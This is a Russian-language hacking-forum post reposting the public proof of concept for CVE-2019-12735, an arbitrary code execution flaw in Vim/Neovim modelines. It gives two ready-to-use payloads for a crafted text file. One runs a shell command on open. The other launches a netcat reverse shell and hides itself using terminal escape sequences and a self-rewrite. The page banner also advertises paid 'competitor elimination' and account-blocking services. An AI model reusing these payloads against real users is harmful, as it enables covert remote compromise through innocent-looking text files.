Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution или же прячем payload в текстовике | ANTICHAT — форум по информационной безопасности и программированию

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution или же прячем payload в текстовике

Опции темы

Поиск в этой теме

Опции просмотра

09.06.2019, 15:20

not eth1cal hack3r

Новичок

Регистрация: 08.06.2019

Сообщений: 13

С нами: 3649146

Репутация: 0

Продукт: Vim < 8.1.1365, Neovim < 0.3.6
Тип: Arbitrary Code Execution
CVE: CVE-2019-12735
Дата: 2019-06-04
Автор: Arminius (@rawsec)

Vim до 8.1.1365 и Neovim до 0.3.6 уязвимы для произвольного выполнения кода через модельные линии, открывая специально созданный текстовый файл

Proof of concept

Создать poc.txt:

Код:

Код:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Убедитесь, что параметр modeline не отключен set modeline).
Открыть фаил в Vim: vim poc.txt
Система будет выполнять uname -a.

Proof of concept 2 (reverse shell)

Этот PoC описывает реальный подход атаки, в котором обратная оболочка запускается после того, как пользователь открывает файл. Чтобы скрыть атаку, файл будет немедленно переписан при открытии. Кроме того, PoC использует терминальные escape-последовательности, чтобы скрыть модельную линию при печати содержимого с помощью cat. (cat-v показывает фактическое содержание.)
shell.txt

payload:

Код:

Код:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Демо эксплуатации уязвимости

𝕏 Twitter Reddit Telegram Копировать ссылку

Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход